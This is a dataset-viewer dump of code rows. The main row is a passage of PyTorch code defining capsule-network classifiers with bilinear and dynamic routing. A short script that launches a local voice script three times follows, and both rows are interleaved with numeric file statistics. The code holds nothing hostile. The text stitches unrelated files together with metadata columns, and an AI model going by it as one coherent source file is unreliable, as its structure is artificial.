self.final_fc = nn.Linear(params['class_capsules']['caps_dim'], 1)
# different classifier for different capsules
#self.final_fc = nn.Parameter(torch.randn(params['class_capsules']['num_caps'], params['class_capsules']['caps_dim']))
def forward(self, x, lbl_1=None, lbl_2=None):
#### Forward Pass
## Backbone (before capsule)
# Converts Input (b, 3, 14, 14)--> (b, 128, 14, 14)
c = self.pre_caps(x)
## Primary Capsule Layer (a single CNN) (Ouput size: b, 512, 14, 14) (32 caps, 16 dim each)
u = self.pc_layer(c)
u = u.permute(0, 2, 3, 1) # b, 14, 14, 512
u = u.view(u.shape[0], self.pc_output_dim, self.pc_output_dim, self.pc_num_caps, self.pc_caps_dim) # b, 14, 14, 32, 16
u = u.permute(0, 3, 1, 2, 4) # b, 32, 14, 14, 16
# Layer norm
init_capsule_value = self.nonlinear_act(u) #capsule_utils.squash(u)
## Main Capsule Layers
# concurrent routing
if not self.sequential_routing:
# first iteration
# perform initilialization for the capsule values as single forward passing
capsule_values, _val = [init_capsule_value], init_capsule_value
for i in range(len(self.capsule_layers)):
_val = self.capsule_layers[i].forward(_val, 0)
capsule_values.append(_val) # get the capsule value for next layer
# second to t iterations
# perform the routing between capsule layers
for n in range(self.num_routing-1):
_capsule_values = [init_capsule_value]
for i in range(len(self.capsule_layers)):
_val = self.capsule_layers[i].forward(capsule_values[i], n,
capsule_values[i+1])
_capsule_values.append(_val)
capsule_values = _capsule_values
# sequential routing
else:
capsule_values, _val = [init_capsule_value], init_capsule_value
for i in range(len(self.capsule_layers)):
# first iteration
__val = self.capsule_layers[i].forward(_val, 0)
# second to t iterations
# perform the routing between the 2 capsule layers for some iterations
# till you move to next pair of layers
for n in range(self.num_routing-1):
__val = self.capsule_layers[i].forward(_val, n, __val)
_val = __val
capsule_values.append(_val)
## After Capsule
# Output capsule (last layer)
out = capsule_values[-1]
out = self.final_fc(out) # fixed classifier for all capsules
out = out.squeeze() # fixed classifier for all capsules
#out = torch.einsum('bnd, nd->bn', out, self.final_fc) # different classifiers for distinct capsules
return out
# Capsule model with bilinear sparse routing
class CapsSAModel(nn.Module):
def __init__(self,
image_dim_size,
params,
dataset,
backbone,
dp,
num_routing,
sequential_routing=True):
super(CapsSAModel, self).__init__()
#### Parameters
self.sequential_routing = sequential_routing
## Primary Capsule Layer
self.pc_num_caps = params['primary_capsules']['num_caps']
self.pc_caps_dim = params['primary_capsules']['caps_dim']
self.pc_output_dim = params['primary_capsules']['out_img_size']
## General
self.num_routing = num_routing # >3 may cause slow converging
#### Building Networks
## Backbone (before capsule)
if backbone == 'simple':
self.pre_caps = layers.simple_backbone(params['backbone']['input_dim'],
params['backbone']['output_dim'],
params['backbone']['kernel_size'],
params['backbone']['stride'],
params['backbone']['padding'])
elif backbone == 'resnet':
# Ouputs 16 X 16 X 128 dim
if dataset == 'CIFAR10' or dataset == 'CIFAR100'or "NIST" in dataset:
print("Using CIFAR backbone")
self.pre_caps = layers.resnet_backbone_cifar(params['backbone']['input_dim'],
params['backbone']['output_dim'],
params['backbone']['stride'])
else:
print("Using New ResNet Backbone")
self.pre_caps = layers.resnet_backbone_imagenet(params['backbone']['input_dim'],
params['backbone']['output_dim'],
params['backbone']['stride'])
## Primary Capsule Layer (a single CNN)
self.pc_layer = nn.Conv2d(in_channels=params['primary_capsules']['input_dim'],
out_channels=params['primary_capsules']['num_caps'] *\
params['primary_capsules']['caps_dim'],
kernel_size=params['primary_capsules']['kernel_size'],
stride=params['primary_capsules']['stride'],
padding=params['primary_capsules']['padding'],
bias=False)
#self.pc_layer = nn.Sequential()
self.nonlinear_act = nn.LayerNorm(params['primary_capsules']['caps_dim'])
## Main Capsule Layers
self.capsule_layers = nn.ModuleList([])
for i in range(len(params['capsules'])):
if params['capsules'][i]['type'] == 'CONV':
in_n_caps = params['primary_capsules']['num_caps'] if i==0 else \
params['capsules'][i-1]['num_caps']
in_d_caps = params['primary_capsules']['caps_dim'] if i==0 else \
params['capsules'][i-1]['caps_dim']
self.capsule_layers.append(
layers.SACapsuleCONV(in_n_capsules=in_n_caps,
in_d_capsules=in_d_caps,
out_n_capsules=params['capsules'][i]['num_caps'],
out_d_capsules=params['capsules'][i]['caps_dim'],
kernel_size=params['capsules'][i]['kernel_size'],
stride=params['capsules'][i]['stride'],
matrix_pose=params['capsules'][i]['matrix_pose'],
dp=dp,
coordinate_add=False,
padding=params['capsules'][i].get('padding', None)
)
)
elif params['capsules'][i]['type'] == 'FC':
if i == 0:
in_n_caps = params['primary_capsules']['num_caps'] * params['primary_capsules']['out_img_size'] *\
params['primary_capsules']['out_img_size']
in_d_caps = params['primary_capsules']['caps_dim']
elif params['capsules'][i-1]['type'] == 'FC':
in_n_caps = params['capsules'][i-1]['num_caps']
in_d_caps = params['capsules'][i-1]['caps_dim']
elif params['capsules'][i-1]['type'] == 'CONV':
in_n_caps = params['capsules'][i-1]['num_caps'] * params['capsules'][i-1]['out_img_size'] *\
params['capsules'][i-1]['out_img_size']
in_d_caps = params['capsules'][i-1]['caps_dim']
self.capsule_layers.append(
layers.SACapsuleFC(in_n_capsules=in_n_caps,
in_d_capsules=in_d_caps,
out_n_capsules=params['capsules'][i]['num_caps'],
out_d_capsules=params['capsules'][i]['caps_dim'],
matrix_pose=params['capsules'][i]['matrix_pose'],
dp=dp
)
)
## Class Capsule Layer
if not len(params['capsules'])==0:
if params['capsules'][-1]['type'] == 'FC':
in_n_caps = params['capsules'][-1]['num_caps']
in_d_caps = params['capsules'][-1]['caps_dim']
elif params['capsules'][-1]['type'] == 'CONV':
in_n_caps = params['capsules'][-1]['num_caps'] * params['capsules'][-1]['out_img_size'] *\
params['capsules'][-1]['out_img_size']
in_d_caps = params['capsules'][-1]['caps_dim']
else:
in_n_caps = params['primary_capsules']['num_caps'] * params['primary_capsules']['out_img_size'] *\
params['primary_capsules']['out_img_size']
in_d_caps = params['primary_capsules']['caps_dim']
self.capsule_layers.append(
layers.SACapsuleFC(in_n_capsules=in_n_caps,
in_d_capsules=in_d_caps,
out_n_capsules=params['class_capsules']['num_caps'],
out_d_capsules=params['class_capsules']['caps_dim'],
matrix_pose=params['class_capsules']['matrix_pose'],
dp=dp
)
)
## After Capsule
# fixed classifier for all class capsules
self.final_fc = nn.Linear(params['class_capsules']['caps_dim'], 1)
# different classifier for different capsules
#self.final_fc = nn.Parameter(torch.randn(params['class_capsules']['num_caps'], params['class_capsules']['caps_dim']))
def forward(self, x, lbl_1=None, lbl_2=None):
#### Forward Pass
## Backbone (before capsule)
c = self.pre_caps(x)
# print(c.shape)
# print("Backbone: ", c.shape)
## Primary Capsule Layer (a single CNN)
u = self.pc_layer(c) # torch.Size([100, 512, 14, 14])
u = u.permute(0, 2, 3, 1) # 100, 14, 14, 512
# print("Shape:", u.shape)
u = u.view(u.shape[0], self.pc_output_dim, self.pc_output_dim, self.pc_num_caps, self.pc_caps_dim) # 100, 14, 14, 32, 16
u = u.permute(0, 3, 1, 2, 4) # 100, 32, 14, 14, 16
init_capsule_value = self.nonlinear_act(u)#capsule_utils.squash(u)
## Main Capsule Layers
# concurrent routing
if not self.sequential_routing:
# first iteration
# perform initilialization for the capsule values as single forward passing
capsule_values, _val = [init_capsule_value], init_capsule_value
for i in range(len(self.capsule_layers)):
_val = self.capsule_layers[i].forward(_val, 0)
capsule_values.append(_val) # get the capsule value for next layer
# second to t iterations
# perform the routing between capsule layers
for n in range(self.num_routing-1):
_capsule_values = [init_capsule_value]
for i in range(len(self.capsule_layers)):
_val = self.capsule_layers[i].forward(capsule_values[i], n,
capsule_values[i+1])
_capsule_values.append(_val)
capsule_values = _capsule_values
# sequential routing
else:
capsule_values, _val = [init_capsule_value], init_capsule_value
for i in range(len(self.capsule_layers)):
# first iteration
__val = self.capsule_layers[i].forward(_val, 0)
# second to t iterations
# perform the routing between capsule layers
for n in range(self.num_routing-1):
__val = self.capsule_layers[i].forward(_val, n, __val)
_val = __val
capsule_values.append(_val)
## After Capsule
out = capsule_values[-1]
# print("out shape, ", out.shape)
out = self.final_fc(out) # fixed classifier for all capsules
# print("classifier shape, ", out.shape)
out = out.squeeze(1) # fixed classifier for all capsules
out = out.squeeze(2)
out = out.squeeze(1)
#out = torch.einsum('bnd, nd->bn', out, self.final_fc) # different classifiers for distinct capsules
# print("Final shape, ", out.shape)
return out
# Capsule model with bilinear routing without sinkhorn
class CapsBAModel(nn.Module):
def __init__(self,
image_dim_size,
params,
dataset,
backbone,
dp,
num_routing,
sequential_routing=True):
super(CapsBAModel, self).__init__()
#### Parameters
self.sequential_routing = sequential_routing
## Primary Capsule Layer
self.pc_num_caps = params['primary_capsules']['num_caps']
self.pc_caps_dim = params['primary_capsules']['caps_dim']
self.pc_output_dim = params['primary_capsules']['out_img_size']
## General
self.num_routing = num_routing # >3 may cause slow converging
#### Building Networks
## Backbone (before capsule)
if backbone == 'simple':
self.pre_caps = layers.simple_backbone(params['backbone']['input_dim'],
params['backbone']['output_dim'],
params['backbone']['kernel_size'],
params['backbone']['stride'],
params['backbone']['padding'])
elif backbone == 'resnet':
# Ouputs 16 X 16 X 128 dim
if dataset == 'CIFAR10' or dataset == 'CIFAR100'or "NIST" in dataset:
print("Using CIFAR backbone")
self.pre_caps = layers.resnet_backbone_cifar(params['backbone']['input_dim'],
params['backbone']['output_dim'],
params['backbone']['stride'])
else:
print("Using New ResNet Backbone")
self.pre_caps = layers.resnet_backbone_imagenet(params['backbone']['input_dim'],
params['backbone']['output_dim'],
params['backbone']['stride'])
## Primary Capsule Layer (a single CNN)
self.pc_layer = nn.Conv2d(in_channels=params['primary_capsules']['input_dim'],
out_channels=params['primary_capsules']['num_caps'] *\
params['primary_capsules']['caps_dim'],
kernel_size=params['primary_capsules']['kernel_size'],
stride=params['primary_capsules']['stride'],
padding=params['primary_capsules']['padding'],
bias=False)
#self.pc_layer = nn.Sequential()
self.nonlinear_act = nn.LayerNorm(params['primary_capsules']['caps_dim'])
## Main Capsule Layers
self.capsule_layers = nn.ModuleList([])
for i in range(len(params['capsules'])):
if params['capsules'][i]['type'] == 'CONV':
in_n_caps = params['primary_capsules']['num_caps'] if i==0 else \
params['capsules'][i-1]['num_caps']
in_d_caps = params['primary_capsules']['caps_dim'] if i==0 else \
params['capsules'][i-1]['caps_dim']
self.capsule_layers.append(
layers.BACapsuleCONV(in_n_capsules=in_n_caps,
in_d_capsules=in_d_caps,
out_n_capsules=params['capsules'][i]['num_caps'],
out_d_capsules=params['capsules'][i]['caps_dim'],
kernel_size=params['capsules'][i]['kernel_size'],
stride=params['capsules'][i]['stride'],
matrix_pose=params['capsules'][i]['matrix_pose'],
dp=dp,
coordinate_add=False,
padding=params['capsules'][i].get('padding', None)
)
)
elif params['capsules'][i]['type'] == 'FC':
if i == 0:
in_n_caps = params['primary_capsules']['num_caps'] * params['primary_capsules']['out_img_size'] *\
params['primary_capsules']['out_img_size']
in_d_caps = params['primary_capsules']['caps_dim']
elif params['capsules'][i-1]['type'] == 'FC':
in_n_caps = params['capsules'][i-1]['num_caps']
in_d_caps = params['capsules'][i-1]['caps_dim']
elif params['capsules'][i-1]['type'] == 'CONV':
in_n_caps = params['capsules'][i-1]['num_caps'] * params['capsules'][i-1]['out_img_size'] *\
params['capsules'][i-1]['out_img_size']
in_d_caps = params['capsules'][i-1]['caps_dim']
self.capsule_layers.append(
layers.BACapsuleFC(in_n_capsules=in_n_caps,
in_d_capsules=in_d_caps,
out_n_capsules=params['capsules'][i]['num_caps'],
out_d_capsules=params['capsules'][i]['caps_dim'],
matrix_pose=params['capsules'][i]['matrix_pose'],
dp=dp
)
)
## Class Capsule Layer
if not len(params['capsules'])==0:
if params['capsules'][-1]['type'] == 'FC':
in_n_caps = params['capsules'][-1]['num_caps']
in_d_caps = params['capsules'][-1]['caps_dim']
elif params['capsules'][-1]['type'] == 'CONV':
in_n_caps = params['capsules'][-1]['num_caps'] * params['capsules'][-1]['out_img_size'] *\
params['capsules'][-1]['out_img_size']
in_d_caps = params['capsules'][-1]['caps_dim']
else:
in_n_caps = params['primary_capsules']['num_caps'] * params['primary_capsules']['out_img_size'] *\
params['primary_capsules']['out_img_size']
in_d_caps = params['primary_capsules']['caps_dim']
self.capsule_layers.append(
layers.BACapsuleFC(in_n_capsules=in_n_caps,
in_d_capsules=in_d_caps,
out_n_capsules=params['class_capsules']['num_caps'],
out_d_capsules=params['class_capsules']['caps_dim'],
matrix_pose=params['class_capsules']['matrix_pose'],
dp=dp
)
)
## After Capsule
# fixed classifier for all class capsules
self.final_fc = nn.Linear(params['class_capsules']['caps_dim'], 1)
# different classifier for different capsules
#self.final_fc = nn.Parameter(torch.randn(params['class_capsules']['num_caps'], params['class_capsules']['caps_dim']))
def forward(self, x, lbl_1=None, lbl_2=None):
#### Forward Pass
## Backbone (before capsule)
c = self.pre_caps(x)
# print(c.shape)
# print("Backbone: ", c.shape)
## Primary Capsule Layer (a single CNN)
u = self.pc_layer(c) # torch.Size([100, 512, 14, 14])
u = u.permute(0, 2, 3, 1) # 100, 14, 14, 512
# print("Shape:", u.shape)
u = u.view(u.shape[0], self.pc_output_dim, self.pc_output_dim, self.pc_num_caps, self.pc_caps_dim) # 100, 14, 14, 32, 16
u = u.permute(0, 3, 1, 2, 4) # 100, 32, 14, 14, 16
init_capsule_value = self.nonlinear_act(u)#capsule_utils.squash(u)
## Main Capsule Layers
# concurrent routing
if not self.sequential_routing:
# first iteration
# perform initilialization for the capsule values as single forward passing
capsule_values, _val = [init_capsule_value], init_capsule_value
for i in range(len(self.capsule_layers)):
_val = self.capsule_layers[i].forward(_val, 0)
capsule_values.append(_val) # get the capsule value for next layer
# second to t iterations
# perform the routing between capsule layers
for n in range(self.num_routing-1):
_capsule_values = [init_capsule_value]
for i in range(len(self.capsule_layers)):
_val = self.capsule_layers[i].forward(capsule_values[i], n,
capsule_values[i+1])
_capsule_values.append(_val)
capsule_values = _capsule_values
# sequential routing
else:
capsule_values, _val = [init_capsule_value], init_capsule_value
for i in range(len(self.capsule_layers)):
# first iteration
__val = self.capsule_layers[i].forward(_val, 0)
# second to t iterations
# perform the routing between capsule layers
for n in range(self.num_routing-1):
__val = self.capsule_layers[i].forward(_val, n, __val)
_val = __val
capsule_values.append(_val)
## After Capsule
out = capsule_values[-1]
# print("out shape, ", out.shape)
out = self.final_fc(out) # fixed classifier for all capsules
# print("classifier shape, ", out.shape)
out = out.squeeze(1) # fixed classifier for all capsules
out = out.squeeze(2)
out = out.squeeze(1)
#out = torch.einsum('bnd, nd->bn', out, self.final_fc) # different classifiers for distinct capsules
# print("Final shape, ", out.shape)
return out
# Capsule model with bilinear routing with dynamic routing
class CapsDBAModel(nn.Module):
def __init__(self,
image_dim_size,
params,
dataset,
backbone,
dp,
num_routing,
sequential_routing=True):
super(CapsDBAModel, self).__init__()
#### Parameters
self.sequential_routing = sequential_routing
## Primary Capsule Layer
self.pc_num_caps = params['primary_capsules']['num_caps']
self.pc_caps_dim = params['primary_capsules']['caps_dim']
self.pc_output_dim = params['primary_capsules']['out_img_size']
## General
self.num_routing = num_routing # >3 may cause slow converging
#### Building Networks
## Backbone (before capsule)
if backbone == 'simple':
self.pre_caps = layers.simple_backbone(params['backbone']['input_dim'],
params['backbone']['output_dim'],
params['backbone']['kernel_size'],
params['backbone']['stride'],
params['backbone']['padding'])
elif backbone == 'resnet':
# Ouputs 16 X 16 X 128 dim
if dataset == 'CIFAR10' or dataset == 'CIFAR100'or "NIST" in dataset:
print("Using CIFAR backbone")
self.pre_caps = layers.resnet_backbone_cifar(params['backbone']['input_dim'],
params['backbone']['output_dim'],
params['backbone']['stride'])
else:
print("Using New ResNet Backbone")
self.pre_caps = layers.resnet_backbone_imagenet(params['backbone']['input_dim'],
params['backbone']['output_dim'],
params['backbone']['stride'])
## Primary Capsule Layer (a single CNN)
self.pc_layer = nn.Conv2d(in_channels=params['primary_capsules']['input_dim'],
out_channels=params['primary_capsules']['num_caps'] *\
params['primary_capsules']['caps_dim'],
kernel_size=params['primary_capsules']['kernel_size'],
stride=params['primary_capsules']['stride'],
padding=params['primary_capsules']['padding'],
bias=False)
#self.pc_layer = nn.Sequential()
self.nonlinear_act = nn.LayerNorm(params['primary_capsules']['caps_dim'])
## Main Capsule Layers
self.capsule_layers = nn.ModuleList([])
for i in range(len(params['capsules'])):
if params['capsules'][i]['type'] == 'CONV':
in_n_caps = params['primary_capsules']['num_caps'] if i==0 else \
params['capsules'][i-1]['num_caps']
in_d_caps = params['primary_capsules']['caps_dim'] if i==0 else \
params['capsules'][i-1]['caps_dim']
self.capsule_layers.append(
layers.DBACapsuleCONV(in_n_capsules=in_n_caps,
in_d_capsules=in_d_caps,
out_n_capsules=params['capsules'][i]['num_caps'],
out_d_capsules=params['capsules'][i]['caps_dim'],
kernel_size=params['capsules'][i]['kernel_size'],
stride=params['capsules'][i]['stride'],
matrix_pose=params['capsules'][i]['matrix_pose'],
dp=dp,
coordinate_add=False,
padding=params['capsules'][i].get('padding', None)
)
)
elif params['capsules'][i]['type'] == 'FC':
if i == 0:
in_n_caps = params['primary_capsules']['num_caps'] * params['primary_capsules']['out_img_size'] *\
params['primary_capsules']['out_img_size']
in_d_caps = params['primary_capsules']['caps_dim']
elif params['capsules'][i-1]['type'] == 'FC':
in_n_caps = params['capsules'][i-1]['num_caps']
in_d_caps = params['capsules'][i-1]['caps_dim']
elif params['capsules'][i-1]['type'] == 'CONV':
in_n_caps = params['capsules'][i-1]['num_caps'] * params['capsules'][i-1]['out_img_size'] *\
params['capsules'][i-1]['out_img_size']
in_d_caps = params['capsules'][i-1]['caps_dim']
self.capsule_layers.append(
layers.DBACapsuleFC(in_n_capsules=in_n_caps,
in_d_capsules=in_d_caps,
out_n_capsules=params['capsules'][i]['num_caps'],
out_d_capsules=params['capsules'][i]['caps_dim'],
matrix_pose=params['capsules'][i]['matrix_pose'],
dp=dp
)
)
## Class Capsule Layer
if not len(params['capsules'])==0:
if params['capsules'][-1]['type'] == 'FC':
in_n_caps = params['capsules'][-1]['num_caps']
in_d_caps = params['capsules'][-1]['caps_dim']
elif params['capsules'][-1]['type'] == 'CONV':
in_n_caps = params['capsules'][-1]['num_caps'] * params['capsules'][-1]['out_img_size'] *\
params['capsules'][-1]['out_img_size']
in_d_caps = params['capsules'][-1]['caps_dim']
else:
in_n_caps = params['primary_capsules']['num_caps'] * params['primary_capsules']['out_img_size'] *\
params['primary_capsules']['out_img_size']
in_d_caps = params['primary_capsules']['caps_dim']
self.capsule_layers.append(
layers.DBACapsuleFC(in_n_capsules=in_n_caps,
in_d_capsules=in_d_caps,
out_n_capsules=params['class_capsules']['num_caps'],
out_d_capsules=params['class_capsules']['caps_dim'],
matrix_pose=params['class_capsules']['matrix_pose'],
dp=dp
)
)
## After Capsule
# fixed classifier for all class capsules
self.final_fc = nn.Linear(params['class_capsules']['caps_dim'], 1)
# different classifier for different capsules
#self.final_fc = nn.Parameter(torch.randn(params['class_capsules']['num_caps'], params['class_capsules']['caps_dim']))
def forward(self, x, lbl_1=None, lbl_2=None):
#### Forward Pass
## Backbone (before capsule)
c = self.pre_caps(x)
# print(c.shape)
# print("Backbone: ", c.shape)
## Primary Capsule Layer (a single CNN)
u = self.pc_layer(c) # torch.Size([100, 512, 14, 14])
u = u.permute(0, 2, 3, 1) # 100, 14, 14, 512
# print("Shape:", u.shape)
u = u.view(u.shape[0], self.pc_output_dim, self.pc_output_dim, self.pc_num_caps, self.pc_caps_dim) # 100, 14, 14, 32, 16
u = u.permute(0, 3, 1, 2, 4) # 100, 32, 14, 14, 16
# init_capsule_value = self.nonlinear_act(u)#capsule_utils.squash(u)
init_capsule_value = u
## Main Capsule Layers
# Sequetial routing only
if self.sequential_routing:
capsule_values, _val = [init_capsule_value], init_capsule_value
for i in range(len(self.capsule_layers)):
routing_coeff = None
for n in range(self.num_routing):
# print("Routing num ", n)
new_coeff, __val = self.capsule_layers[i].forward(_val, n, routing_coeff)
routing_coeff = new_coeff
_val = __val
capsule_values.append(_val)
## After Capsule
out = capsule_values[-1]
# print("out shape, ", out.shape)
out = self.final_fc(out) # fixed classifier for all capsules
# print("classifier shape, ", out.shape)
out = out.squeeze(1) # fixed classifier for all capsules
out = out.squeeze(2)
out = out.squeeze(1)
#out = torch.einsum('bnd, nd->bn', out, self.final_fc) # different classifiers for distinct capsules
# print("Final shape, ", out.shape)
return out
| 54.235412
| 205
| 0.478854
| 5,394
| 53,910
| 4.520208
| 0.040786
| 0.092445
| 0.067673
| 0.034124
| 0.952916
| 0.947051
| 0.94135
| 0.939792
| 0.93528
| 0.932327
| 0
| 0.018495
| 0.405249
| 53,910
| 993
| 206
| 54.29003
| 0.741946
| 0.133463
| 0
| 0.907381
| 0
| 0
| 0.155533
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.014472
| false
| 0
| 0.005789
| 0
| 0.034732
| 0.015919
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b40df0303f8abde0680ff7f5cccb14e409be1bf3
| 241
|
py
|
Python
|
Gofer_voice/multi_hear.py
|
Srinath-tr/Goferbot
|
0f734d01c6504c6c97dbdf45f5adf8b25c0f9fd9
|
[
"Apache-2.0",
"bzip2-1.0.6"
] | 1
|
2019-04-23T21:50:08.000Z
|
2019-04-23T21:50:08.000Z
|
Gofer_voice/multi_hear.py
|
Srinath-tr/Goferbot
|
0f734d01c6504c6c97dbdf45f5adf8b25c0f9fd9
|
[
"Apache-2.0",
"bzip2-1.0.6"
] | null | null | null |
Gofer_voice/multi_hear.py
|
Srinath-tr/Goferbot
|
0f734d01c6504c6c97dbdf45f5adf8b25c0f9fd9
|
[
"Apache-2.0",
"bzip2-1.0.6"
] | 2
|
2019-02-14T08:13:33.000Z
|
2019-04-23T21:47:48.000Z
|
import subprocess
subprocess.Popen(['python','hear_auto.py'])
subprocess.Popen(['python','hear_auto.py'])
subprocess.Popen(['python','hear_auto.py'])
#subprocess.Popen(['python','hear_auto.py'])
#subprocess.Popen(['python','hear_auto.py'])
| 30.125
| 44
| 0.73029
| 32
| 241
| 5.34375
| 0.21875
| 0.438596
| 0.614035
| 0.730994
| 0.906433
| 0.906433
| 0.906433
| 0.906433
| 0.906433
| 0.906433
| 0
| 0
| 0.033195
| 241
| 7
| 45
| 34.428571
| 0.733906
| 0.356846
| 0
| 0.75
| 0
| 0
| 0.352941
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.25
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.